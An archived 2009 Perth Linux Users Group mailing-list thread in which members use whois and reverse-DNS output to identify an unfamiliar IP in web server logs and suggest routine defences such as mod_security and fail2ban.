michaelbaker at westnet.com.au michaelbaker at westnet.com.au
Sun Jan 11 22:35:41 WST 2009

Most likely a script kiddy box or a hacked machine running scripts to search for RFI's which will allow it to execute PHP code on your web server.. Google mod_security that will stop alot of it or get sommething like fail2ban watching the web server logs for 404's and it can firewall the IP's for you
----- Original Message -----
From: Niffum <bulkniffum at iinet.net.au>
To: plug at plug.org.au
Sent: Sun, 11 Jan 2009 19:01:30 +0900 (WST)
Subject: Re: [plug]

I tried nslookup to resolve the ip address, I didn't know about dig -x..

I thought it may be a dodgy host because i would expect that a non 
dodgy host would have created a reverse lookup that i could just nslookup.

Trend is installed on this pc so that would be why.  I was about to 
add that ip address to my already huge hosts.deny

At 05:52 PM 11/01/2009, you wrote:

>it seems that the IP address is hosted in Japan.
>whois tells me
>inetnum: -
>netname:      JAPAN150
>country:      JP
>descr:        Japan Network Information Center
>    <snip>
>role:         Japan Network Information Center
>address:      Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
>address:      Chiyoda-ku, Tokyo 101-0047, Japan
>country:      JP
>    <snip>
>and a reverse DNS tells me that trendmicro are using the specific IP.
>dig -x
>; <<>> DiG 9.3.4-P1 <<>> -x
>;; global options:  printcmd
>;; Got answer:
>;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26411
>;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
>;     IN      PTR
>70.150.in-addr.arpa.    3600    IN      SOA 
>tmns1.trendmicro.com. dnsadmin.trendmicro.com. 55 60 600 86400 3600
>;; Query time: 1058 msec
>;; WHEN: Sun Jan 11 17:40:17 2009
>;; MSG SIZE  rcvd: 108
>Not knowing your set up: is it possible you have the trendmicro 
>antivirus software installed and that this is using a remote service 
>to check websites for malicious code or what ever on the website?
>My dealings with Trendmicro is that their products are pretty good 
>so I don't think that it is a dodgy remote host.
>good luck

PLUG discussion list: plug at plug.org.au
Committee e-mail: committee at plug.linux.org.au

More information about the plug mailing list